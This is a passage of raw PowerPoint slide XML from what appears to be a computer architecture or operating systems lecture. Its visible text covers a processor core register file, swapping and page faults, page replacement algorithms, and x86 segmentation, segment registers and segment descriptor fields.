          <a:xfrm>
            <a:off x="2292350" y="571182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5" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2292350" y="59864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6" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2200275" y="1414463"/>
            <a:ext cx="457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Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>31</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13327" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6315075" y="1414463"/>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Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13328" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2303463" y="1895475"/>
            <a:ext cx="1462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r0 – r25</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13329" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2292350" y="32432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dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>r29	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Level 1 interrupt link register (ILINK1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13330" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2292350" y="351790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dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>r30	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Level 2 interrupt link register (ILINK2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13331" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2292350" y="3792538"/>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r31	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Branch link register (BLINK)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" b="1">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13332" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2292350" y="5164138"/>
            <a:ext cx="4205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r60	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Loop counter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13333" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2292350" y="5438775"/>
            <a:ext cx="411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r61	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" i="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" i="1">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13334" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2292350" y="5711825"/>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r62	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Long immediate data indicator</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" b="1">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13335" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2292350" y="59864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r63	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Current PC (long word aligned)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" b="1">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13336" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3408363" y="4233863"/>
            <a:ext cx="1905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1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Free slots for Extension Core Registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" b="1">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314398" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Core Register File</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13338" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="2403475"/>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r26	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Global pointer (GP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13339" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2292350" y="26717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r27	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Frame pointer (FP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13340" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2284413" y="29638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r28	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Stack pointer (SP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13341" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="29765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a:off x="2298700" y="270351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3" name="Line 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="2417763"/>
            <a:ext cx="4205288"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36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6303963" y="5986463"/>
            <a:ext cx="0" cy="263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5" name="Text Box 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6265863" y="59404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solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13346" name="Text Box 38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6072188" y="59404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solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2088252999"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOv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Swapping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Swapping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>refers to the ability to use a small physical memory and a large “backing storage” for code data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When a page is accessed but the PTE entry shows it is not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>present</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, the memory controller will issue an interrupt (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>page fault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The OS will then read the “backing storage” and bring the page in, then exit the ISR to continue running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The OS needs to select a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> page to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>swap out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>dirty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Swapping can be done in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>process level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>rather than in a page level – triggered by the scheduler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41748539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replacement algorithms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Optimal” page replacement algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Random</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FIFO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second-chance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LRU – Least Recently Used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NRU – Not Recently Used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3791836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69950" y="293688"/>
            <a:ext cx="7391400" cy="620712"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Segmentation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1066800"/>
            <a:ext cx="8458200" cy="5486400"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Linear Address Space”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t> is divided into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“segments”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t> holding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Code, data and stack for programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Logical Address (or far pointer)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t> = Segment : Offset </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Segment Selector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Provides an offset into a descriptor table to a data structure called a segment descriptor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Segment Descriptor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Specifies the size, access rights, privilege level, type and base address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>6 active segment registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0"/>
              <a:t>CS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>: code, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0"/>
              <a:t>DS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>: data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0"/>
              <a:t>SS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>: stack, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0"/>
              <a:t>ES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>: extra. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0"/>
              <a:t>FS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0"/>
              <a:t>GS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>: new extra</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386004046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noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Segment Registers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="18434" name="Object 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1905000" y="1050925"/>
          <a:ext cx="5580063" cy="2454275"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s41988" name="Visio" r:id="rId3" imgW="4572914" imgH="2011985" progId="Visio.Drawing.6">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="4572914" imgH="201198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050925"/>
                        <a:ext cx="5580063"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Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="3733800"/>
            <a:ext cx="8382000" cy="2743200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Code-segment (CS), data-segment (DS), and stack-segment (SS) registers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>must be loaded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>valid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> segment selectors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ES, FS, and GS can be used to make additional data segments available to task.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>When a segment selector is loaded into the visible part of a segment register, the processor also loads the hidden part of the segment register.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Instructions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Direct load: MOV SR, POP SR, LDS, LES, LSS, LGS, and LFS instructions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> Implied load: far CALL, JMP, and RET; SYSENTER and SYSEXIT; IRET, INT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, INTO and INT3 instructions. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21985568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noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Segment Descriptor Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="3913188"/>
            <a:ext cx="6435725" cy="2563812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" smtClean="0"/>
              <a:t>AVL 	– Available for use by system software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" smtClean="0"/>
              <a:t>BASE	– Segment base address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" smtClean="0"/>
              <a:t>D/B 	– Default operation size (0 = 16-bit segment; 1 = 32-bit segment)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" smtClean="0"/>
              <a:t>DPL 	– Descriptor privilege level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" smtClean="0"/>
              <a:t>G 		– Granularity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" smtClean="0"/>
              <a:t>LIMIT 	– Segment limit</a:t>
